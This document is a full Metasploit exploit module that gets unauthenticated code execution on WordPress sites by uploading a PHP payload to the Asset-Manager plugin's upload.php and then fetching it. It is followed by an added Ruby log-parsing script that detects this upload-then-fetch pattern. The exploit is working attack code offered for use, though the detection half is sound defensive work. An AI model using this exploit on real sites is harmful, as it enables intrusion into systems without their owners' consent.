This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin allows PHP files to be uploaded: a user can upload a file to a temp directory without any authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin reads the file from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
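The two requests the module makes (an unauthenticated POST to the plugin's upload.php, then a GET of a .php file under wp-content/uploads/assets/temp/) leave a clear trace in web server logs. The following is an added detection example, not part of the original post or of the Metasploit module: it parses combined-format access log lines (the sample lines, IPs and file names are constructed) and reports client IPs that performed an upload followed by a successful fetch of a PHP file from the temp directory.

```ruby
require 'time'

# Constructed sample access log lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [26/May/2012:10:01:12 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.7 - - [26/May/2012:10:01:15 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
  203.0.113.7 - - [26/May/2012:10:01:16 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzpa.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.2 - - [26/May/2012:10:02:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/image.jpg HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
LOG

# Fields we need from a combined-format line: client IP, timestamp, method, path, status.
LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Paths used by the technique: the plugin's upload handler and a PHP file in its temp directory.
UPLOAD_RE   = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}

# Returns { events: { ip => [ {kind:, path:, ts:}, ... ] }, chained_ips: [...] } where
# chained_ips lists clients that uploaded and later fetched a temp PHP file with HTTP 200.
def detect_asset_manager_abuse(log_text)
  events = Hash.new { |h, k| h[k] = [] }
  log_text.each_line do |line|
    m = LINE_RE.match(line) or next
    path = m[:path].split('?').first          # drop any query string before matching
    kind = if m[:method] == 'POST' && path =~ UPLOAD_RE
             :upload
           elsif m[:method] == 'GET' && path =~ TEMP_PHP_RE && m[:status] == '200'
             :temp_php_exec
           end
    next unless kind
    events[m[:ip]] << { kind: kind, path: path,
                        ts: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z') }
  end
  chained = events.select do |_ip, ev|
    first_upload = ev.select { |e| e[:kind] == :upload }.map { |e| e[:ts] }.min
    last_exec    = ev.select { |e| e[:kind] == :temp_php_exec }.map { |e| e[:ts] }.max
    first_upload && last_exec && last_exec >= first_upload   # execution must follow upload
  end
  { events: events, chained_ips: chained.keys }
end
```

A lone POST to upload.php is also worth alerting on, since the vulnerable versions require no authentication for it; the chained check just raises confidence that code execution followed.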